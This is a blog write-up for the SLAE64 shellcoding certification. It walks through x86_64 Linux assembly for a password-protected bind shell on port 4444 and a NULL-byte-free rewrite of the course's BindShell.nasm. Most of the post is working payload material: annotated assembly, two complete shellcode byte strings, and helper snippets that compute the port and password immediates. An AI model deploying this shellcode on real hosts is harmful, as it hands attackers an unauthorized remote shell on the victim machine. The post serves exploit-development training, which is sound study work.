
SLAE64 - Assignment 1

Following completion of the SLAE32 course (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html), I decided to take advantage of the Pentester Academy account we have at work to continue the training with SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html). As before, we'll work through each assignment in turn, since the write-ups are part of the certification challenge.

Assignment 1 requirements are as follows:

  • Create a Shell_Bind_TCP shellcode
    • Binds to a port
    • Needs a "Passcode"
    • If Passcode is correct then Execs Shell
  • Remove 0x00 from the Bind TCP Shellcode discussed

Ok, easy enough. The full code can be found here: https://github.com/blu3gl0w13/SLAE64/tree/master/assignment-1

If you've read my previous blog posts on the SLAE32 certification challenge, you might be thinking this should be easy: I could just copy and paste my previous code, right? I thought the same thing until I started taking this course. There are actually some pretty big differences, along with at least a few similarities. Let's talk about the differences first.

In x86_64 assembly, the main difference, besides the general purpose registers being widened to 64 bits and renamed (RAX instead of EAX, and so on), is how system calls are made. In x86 assembly, EAX is used for the system call number and the resulting return value. EBX, ECX, and EDX hold the first three arguments (ESI, EDI, and EBP can carry three more). It's pretty easy to run out of registers, and occasionally it is necessary to store the arguments on the stack and pass a pointer to them. The system call is executed with the INT 0x80 software interrupt. Socket system calls all go through a single multiplexing system call, #define __NR_socketcall 102.

In x86_64 assembly, RAX is used for the system call number and the resulting return value. The arguments go in RDI, RSI, RDX, R10, R8, and R9, in that order, so there's plenty of room. System calls are made with the SYSCALL instruction instead of the INT 0x80 interrupt. Finally, in x86_64 assembly you can make the #define __NR_socket 41 system call directly, without going through #define __NR_socketcall 102 first.
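
To make the register convention concrete, here is a small Python sketch that maps a system call number and its arguments onto the x86_64 registers in the order given above. The helper name assign_registers is my own invention for illustration; it only builds a table and does not execute anything.

```python
# Register order for x86_64 Linux system call arguments, as listed in the text.
SYSCALL_ARG_REGISTERS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]


def assign_registers(number, args):
    """Return a dict of register -> value for one system call (illustrative helper)."""
    if len(args) > len(SYSCALL_ARG_REGISTERS):
        raise ValueError("x86_64 system calls take at most six arguments")
    layout = {"rax": number}  # the system call number always goes in RAX
    layout.update(zip(SYSCALL_ARG_REGISTERS, args))
    return layout


# socket(AF_INET, SOCK_STREAM, TCP) with __NR_socket = 41
socket_call = assign_registers(41, [2, 1, 6])
print(socket_call)
```

Reading the result top to bottom gives the same register setup the assembly needs to perform before issuing SYSCALL.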

Now that we have that out of the way, let's jump into the code. We'll start the program like before, defining a global entry point with global _start. Following this, we declare our .text section and create our _start label. In order to avoid NULL bytes, we'll zero RAX by XORing it with itself and then copy 0x29, the system call number for SOCKET, into AL. After this, we'll set up our arguments to SOCKET: 0x2 = AF_INET, 0x1 = SOCK_STREAM, and 0x6 = TCP. This information can be found in the following places:
  • /usr/include/x86_64-linux-gnu/asm/unistd_64.h (SOCKET system call)
  • man 2 socket (AF_INET, SOCK_STREAM)
  • /etc/protocols (TCP)
Finally, we issue the syscall instruction to create our socket. Once that is finished, we'll move our SOCKFD return value from RAX to RDI.

global _start

section .text

_start:

 ; socket syscall
 ; define __NR_socket 41
 ; 

 xor rax, rax  ; initialize rax
 mov al, 0x29  ; int socket(int domain, int type, int protocol)
 xor rdi, rdi  ;
 add rdi, 0x2  ; AF_INET
 xor rsi, rsi  ;
 add rsi, 0x1  ; SOCK_STREAM
 xor rdx, rdx  ;
 add rdx, 0x6  ; TCP
 syscall   ; syscall

 ; save socketfd for later

 mov rdi, rax  ; socketfd into rdi
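
If you'd rather not dig through headers, the argument values used above can be cross-checked from Python. This is just a quick sanity check, assuming a Linux host where Python's socket module exposes the same constants as the C headers.

```python
import socket

# Values passed to socket() in the assembly above, looked up by name.
constants = {
    "AF_INET": int(socket.AF_INET),
    "SOCK_STREAM": int(socket.SOCK_STREAM),
    "IPPROTO_TCP": int(socket.IPPROTO_TCP),
}

for name, value in constants.items():
    print(f"{name} = {value:#x}")
```

The system call number itself (41) is not exposed by the socket module, so that one still has to come from unistd_64.h.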

The next part of the code binds our socket to 0.0.0.0:4444. We'll start by zeroing RAX again with an XOR instruction and copying 0x31 into AL. We'll do the same with RDX and then copy 0x10 into DL as the third argument to the BIND system call. The next set of instructions builds the sockaddr_in structure just below the stack pointer; it will be our second argument. To use it, we have to adjust the stack pointer after our MOV instructions and then copy the address of the top of the stack into RSI. RDI is already set up thanks to the last instruction in the previous block of code, so with our registers ready we issue the syscall instruction to execute the system call.

 ; define __NR_bind 49
 ; struct sockaddr_in {
 ;      sa_family_t    sin_family   address family: AF_INET
 ;      in_port_t      sin_port     port in network byte order
 ;      struct in_addr sin_addr     internet address
 ; };


 xor rax, rax   ; initialize rax
 mov al, 0x31   ; int bind(int sockfd, const struct sockaddr *addr,  
                                        ; socklen_t addrlen)
 xor rdx, rdx   ; initialize rdx
 mov dl, 0x10   ; socklen_t addrlen (16)
 xor rsi, rsi   ; initialize rsi
 mov [rsp - 0x4], esi  ; IP Addr 0.0.0.0
 mov word [rsp - 0x6], 0x5c11 ; Port 4444
 mov [rsp - 0xa], esi  ; zero bytes (clears the high byte of sin_family)
 mov byte [rsp - 0x8], 0x2 ; AF_INET
 sub rsp, 0x8   ; adjust stack
 mov rsi, rsp   ; pointer to sockaddr_in
 syscall    ; syscall
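
The byte layout those MOV instructions build can be reproduced in Python, which also shows why port 4444 is written as 0x5c11 in the source. This is a sketch for checking the values, not part of the shellcode; the variable names are my own.

```python
import socket
import struct

PORT = 4444

family = struct.pack("<H", socket.AF_INET)  # sin_family, host (little-endian) order
port = struct.pack(">H", PORT)              # sin_port, network (big-endian) order
addr = socket.inet_aton("0.0.0.0")          # sin_addr, INADDR_ANY
sockaddr_in = family + port + addr + b"\x00" * 8  # sin_zero padding, 16 bytes total

# A little-endian store of this word lays the port down in network byte order.
port_immediate = int.from_bytes(port, "little")

print(sockaddr_in.hex(), hex(port_immediate), len(sockaddr_in))
```

Port 4444 is 0x115c, so the bytes in memory must be 11 5c. Since x86_64 stores words low byte first, the immediate has to be written as 0x5c11.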

Great, our socket is set up and bound. Next up is to have it listen and then accept connections. We'll cover both now. The listen system call is pretty straightforward. We zero RAX and then copy 0x32 into AL. RDI still holds our SOCKFD so we don't have to worry about that. RSI is zeroed with an XOR instruction and then incremented with the INC instruction, giving a backlog of 1. With our registers set up, we issue the syscall instruction. Once our socket is listening, we need to have it accept connections with the #define __NR_accept 43 system call. We zero RAX with an XOR instruction, push its value onto the stack, and then copy our system call number into AL. All of this helps us avoid NULL bytes in our resulting shellcode. Next, we set up RSI by copying the stack pointer into it. We don't care about the client address that comes back in argument two, so we just need a pointer to zeroed, writable memory that doesn't introduce a NULL byte into our shellcode. A sockaddr_in is 16 bytes long, so we push 0x10 onto the stack, copy the new stack pointer into RDX, and then execute our syscall instruction. The remaining instructions save our SOCKFD into R15 just in case, move our ACCEPTFD into RDI, and then store it again in R9. This probably isn't necessary and I'm being overly cautious.

       ; define __NR_listen 50

 xor rax, rax
 mov al, 0x32  ; int listen(int sockfd, int backlog)
 xor rsi, rsi  ; initialize rsi
 inc rsi   ; int backlog
 syscall   ; syscall
 

 ; define __NR_accept 43

 xor rax, rax
 push rax
 mov al, 0x2b  ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
 mov rsi, rsp  ; struct sockaddr *addr
 push byte 0x10  ; 
 mov rdx, rsp  ; socklen_t *addrlen
 syscall   ; syscall
 xor r15, r15  ; initialize r15
 mov r15, rdi  ; save sockfd just in case
 mov rdi, rax  ; acceptfd for later
 xor r9, r9
 mov r9, rdi  ; to be sure we keep our acceptfd

Excellent, with our socket set up, we'll begin to set up the password requirement. The first set of instructions uses register R14 to push a NULL q-word onto the stack, followed by our password, H4xx0r01. We have to put the password into a register before pushing it because there is no form of PUSH that takes a 64-bit immediate; the largest immediate PUSH accepts is 32 bits (sign-extended to 64), so a full q-word constant has to go through a register. I learned this the hard way after a lot of segfaults and a lot of reading the Intel manual. Once the stack is set up, we copy the stack pointer into R14 because we'll need it later for our comparison. We finish this block by subtracting 0x10 from RSP. Because the stack grows downward, this moves the top of the stack 16 bytes below the password and helps make sure we don't accidentally overwrite it. The next block of code redirects standard in, out, and error to our ACCEPTFD. We'll zero RAX again and use the INC instruction to step RSI through 0, 1, and 2 for each system call. Remember, RDI holds our ACCEPTFD, which we use as the first argument to the #define __NR_dup2 33 system call.

password:

 ; password onto stack in safe place

 xor r14, r14
 push  r14   ; NULL byte onto stack
 mov r14, 0x3130723078783448 ; '10r0xx4H'
 push r14
 mov r14, rsp   ; pointer to password on stack
 sub rsp, 0x10   ; adjust stack 16 bytes so we don't 
                                        ; accidentally overwrite our password

duper:
        ; define __NR_dup2 33

        xor rax, rax
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        xor rsi, rsi            ; int newfd (0 for stdin)
        syscall                 ; syscall
        xor rax, rax            ;
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        inc rsi                 ; int newfd (now 1 for std out)
        syscall                 ; syscall
        xor rax, rax            ;
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        inc rsi                 ; int newfd (2 for stderr)
        syscall                 ; syscall
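
The 64-bit immediate loaded into R14 in the password: block doesn't have to be worked out by hand. A minimal Python sketch, assuming the password is exactly eight ASCII bytes so that it fits in one q-word:

```python
password = b"H4xx0r01"
assert len(password) == 8, "one q-word holds exactly eight bytes"

# Interpreting the bytes as a little-endian integer gives the value that,
# once pushed, reads back as the original string in memory.
immediate = int.from_bytes(password, "little")

print(f"mov r14, {immediate:#018x}")
```

The printed value is the same constant used in the listing, which is why the string looks reversed ('10r0xx4H') when the hex is read left to right.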

This next block of code begins our password prompt. I definitely got a little fancier than necessary, but that's only because I wanted to challenge myself a bit more. This first block uses the #define __NR_write 1 system call to send a faux prompt to the end user asking for a password. Because the stack grows downward, we push the string from its last chunk to its first, and because x86_64 is little endian, the bytes inside each immediate appear reversed.

passprompt:

 ; define __NR_write 1
 ; send prompt through socket

 mov rdi, r9
 push byte 0x1
 pop rax     ; ssize_t write(int fd, const void *buf, 
                                                ; size_t count)
 xor rsi, rsi    ; initialize rsi
 push  rsi    ; push NULL onto the stack
 mov rsi, 0x0a203a64726f7773
 push rsi
 mov rsi, 0x7361502061207265
 push rsi
 mov rsi, 0x746e452065736165
 push rsi
 push word 0x6c50   ; 'lP'
 mov rsi, rsp    ; const void *buf
 xor rdx, rdx    ;
 mov dl, 26    ; size_t count
 syscall     ; syscall
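
Splitting the prompt into push-sized pieces is tedious by hand, so here is a Python sketch of the bookkeeping. The helper push_sequence is hypothetical and only handles the pattern used above: full q-words pushed last chunk first, with any leftover leading bytes pushed at the end (in the listing that is the two-byte push word).

```python
def push_sequence(text: bytes):
    """Return immediates in the order they must be pushed (illustrative helper).

    Leftover bytes that do not fill a q-word form the start of the string
    in memory, so they are pushed last.
    """
    head_len = len(text) % 8
    chunks = [text[i:i + 8] for i in range(head_len, len(text), 8)]
    pushes = [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]
    if head_len:
        pushes.append(int.from_bytes(text[:head_len], "little"))
    return pushes


prompt = b"Please Enter a Password: \n"
pushes = push_sequence(prompt)

print(len(prompt))
for value in pushes:
    print(hex(value))
```

The length it reports is the count passed in DL, and the immediates come out in the same order as the MOV/PUSH pairs in the passprompt: block.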

Next up, we use the #define __NR_read 0 system call to read up to 16 bytes from the socket. Once the input has been read, we need to check the value entered. This is what we do in the block of code with the passwordcheck: label. I chose to use CMPSQ, which compares the q-words at the addresses held in RSI and RDI, so only the first 8 bytes of the input are checked against our 8-byte password. SCASQ could've also been used but would have required the password in RAX and the address of the input in RDI. If the password matches (ZF set), we jump short to our shelltime: label. If it doesn't match (ZF not set), we jump back to our passprompt: label and send our faux prompt through the socket again.

 ; define __NR_read 0

 xor rax, rax  ; ssize_t read(int fd, void *buf, size_t count)
 xor rsi, rsi  ; 
 push rsi
 lea rsi, [rsp -0x10] ; pointer to buffer with entered password
 xor rdx, rdx  ; initialize rdx
 add dl, 0x10  ; size_t count
 syscall   ; syscall

passwordcheck:
 mov rdi, r14  ; password for comparison
 cmpsq   ; compare passwords
 jz shelltime  ; password valid
 jnz passprompt  ; password invalid

Finally, when the correct password is sent, we call the #define __NR_execve 59 system call to launch /bin//sh -i. If you've read any of my SLAE32 blog posts, you know I'm a fan of some sort of indication that we have a prompt. In a real situation this would just bloat our shellcode and would need to be made more efficient. One thing to notice is that we can push hs//nib/ onto the stack all at once from RDI. This is a benefit of the larger registers in x86_64 assembly.

shelltime: 

 ; define __NR_execve 59
 ; /bin//sh -i
 ; int execve(const char *filename, char *const argv[], char *const envp[])

 xor rax, rax
 mov al, 0x3b   ; int execve(const char *filename, char *const argv[], 
                                        ; char *const envp[])
 xor rdi, rdi   ; 
 push rdi   ; NULL byte onto stack
 mov rdi, 0x68732f2f6e69622f ; 'hs//nib/'
 push rdi   ; 'hs//nib/' onto stack
 mov rdi, rsp   ; pointer to 'hs//nib/'
 xor rsi, rsi   ; 
 push rsi   ; NULL byte onto stack
 push word 0x692d  ; 'i-'
 xor r10, r10   ;
 mov r10, rsp   ; store rsp temporarily
 push rsi   ; NULL terminator for argv
 push r10   ; pointer to '-i'
 push rdi   ; pointer to 'hs//nib/'
 mov rsi, rsp   ; char *const argv[]
 xor rdx, rdx   ;
 push rdx   ; NULL byte onto stack
 mov rdx, rsp   ; char *const envp[]
 syscall    ; syscall

Here's our shellcode.

"\x48\x31\xc0\xb0\x29\x48\x31\xff\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x48\x31\xd2\x48\x83"
"\xc2\x06\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x31\x48\x31\xd2\xb2\x10\x48\x31\xf6\x89\x74\x24\xfc"
"\x66\xc7\x44\x24\xfa\x11\x5c\x89\x74\x24\xf6\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x89\xe6\x0f"
"\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\xb0\x2b\x48\x89\xe6\x6a"
"\x10\x48\x89\xe2\x0f\x05\x4d\x31\xff\x49\x89\xff\x48\x89\xc7\x4d\x31\xc9\x49\x89\xf9\x4d\x31\xf6"
"\x41\x56\x49\xbe\x48\x34\x78\x78\x30\x72\x30\x31\x41\x56\x49\x89\xe6\x48\x83\xec\x10\x48\x31\xc0"
"\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff"
"\xc6\x0f\x05\x4c\x89\xcf\x6a\x01\x58\x48\x31\xf6\x56\x48\xbe\x73\x77\x6f\x72\x64\x3a\x20\x0a\x56"
"\x48\xbe\x65\x72\x20\x61\x20\x50\x61\x73\x56\x48\xbe\x65\x61\x73\x65\x20\x45\x6e\x74\x56\x66\x68"
"\x50\x6c\x48\x89\xe6\x48\x31\xd2\xb2\x1a\x0f\x05\x48\x31\xc0\x48\x31\xf6\x56\x48\x8d\x74\x24\xf0"
"\x48\x31\xd2\x80\xc2\x10\x0f\x05\x4c\x89\xf7\x48\xa7\x74\x02\x75\xaa\x48\x31\xc0\xb0\x3b\x48\x31"
"\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x56\x66\x68\x2d\x69"
"\x4d\x31\xd2\x49\x89\xe2\x56\x41\x52\x57\x48\x89\xe6\x48\x31\xd2\x52\x48\x89\xe2\x0f\x05"

And now we run it to make sure it works. While 310 bytes isn't horrible, I wouldn't use such bloated shellcode in a real penetration assessment. I like the password protection scheme though, so I might edit this to reduce its size a bit at a later time.

 

 For the next part of the assignment we were tasked with changing Vivek's BindShell.nasm from the course so that it didn't have any NULL bytes. The original code can be found here: https://github.com/blu3gl0w13/SLAE64/blob/master/assignment-1/BindShell.nasm

 Below is the adjusted BindShell-adjusted.nasm.

;-------------------------------------------------
; BindShell-adjusted.nasm
; by Michael Born (@blu3gl0w13)
; Student ID: SLAE64-1439
; November 7, 2016
; Original version by: Vivek Ramachandran
; SecurityTube Linux Assembly Expert 64
;-------------------------------------------------

global _start


_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi
 mov dil, 2
 xor rsi, rsi
 mov sil, 1
 xor rdx, rdx
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11
 mov [rsp - 0xa], eax
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49

 xor rax, rax
 mov al, 49
 mov rsi, rsp
 xor rdx, rdx
 mov dl, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50

 xor rax, rax
 mov al, 50
 xor rsi, rsi
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43

 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
        mov byte [rsp-1], 16
        sub rsp, 1
        mov rdx, rsp

        syscall

 ; store the client socket descriptor
 xor r9, r9
 mov r9, rax 

        ; close parent

 xor rax, rax
        mov al, 3
        syscall

        ; duplicate sockets

        ; dup2 (new, old)
        mov rdi, r9
 xor rax, rax
        mov al, 33
        xor rsi, rsi
        syscall

 xor rax, rax
        mov al, 33
 inc rsi
        syscall

 xor rax, rax
        mov al, 33
        inc rsi
        syscall



        ; execve

        ; First NULL push

        xor rax, rax
        push rax

        ; push /bin//sh in reverse

 xor rbx, rbx
        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI

        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp


        ; Push address of /bin//sh
        push rdi

        ; set RSI

        mov rsi, rsp

        ; Call the Execve syscall
        add al, 59
        syscall
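
To see why the XOR-then-MOV pattern used throughout the adjusted listing avoids NULL bytes, compare the two encodings in Python. The mov eax, 41 encoding here is my own illustrative example of a 32-bit immediate load (opcode B8 followed by four immediate bytes); I'm not claiming it is the exact instruction in the original BindShell.nasm.

```python
# mov eax, 41: opcode B8 followed by a 32-bit immediate, three of whose bytes are zero.
MOV_EAX_41 = bytes([0xB8, 0x29, 0x00, 0x00, 0x00])

# xor rax, rax ; mov al, 41 (bytes as they appear in the shellcode dumps in this post).
XOR_THEN_MOV_AL = bytes([0x48, 0x31, 0xC0, 0xB0, 0x29])


def null_count(code: bytes) -> int:
    """Count NULL bytes in an instruction encoding."""
    return code.count(0)


print(null_count(MOV_EAX_41), null_count(XOR_THEN_MOV_AL))
```

Both sequences are five bytes long, so in this case removing the NULL bytes costs nothing in size.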

So how did we do? Let's check the shellcode output. For this, we'll use some scripts I developed during the SLAE32 class found here: https://github.com/blu3gl0w13/SLAE64/tree/master/scripts. Looks like we don't have any NULL bytes. Great!

"\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2"
"\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c"
"\x89\x44\x24\xf6\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89"
"\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f"
"\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83"
"\xec\x01\x48\x89\xe2\x0f\x05\x4d\x31\xc9\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05"
"\x4c\x89\xcf\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff"
"\xc6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x48\x31\xdb"
"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05"

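The NULL-byte check itself is easy to reproduce. The sketch below is not the script from my repository; it is a minimal stand-in that parses a dump in the \x format shown above and reports the offset of any NULL byte. The sample is just the last line of the dump.

```python
import re


def parse_dump(dump: str) -> bytes:
    """Turn text containing \\xNN escapes into raw bytes."""
    return bytes(int(pair, 16) for pair in re.findall(r"\\x([0-9a-fA-F]{2})", dump))


def null_offsets(code: bytes):
    """Return the offsets of every NULL byte in the shellcode."""
    return [offset for offset, value in enumerate(code) if value == 0]


# Last line of the dump above, used as a short sample.
sample = r'"\x89\xe6\x04\x3b\x0f\x05"'
code = parse_dump(sample)

print(len(code), null_offsets(code))
```

Pasting the whole dump into sample gives the total length and, if the adjustment worked, an empty list of offsets.
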
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert 64-bit certification:

  http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

 Student ID: SLAE64 - 1439

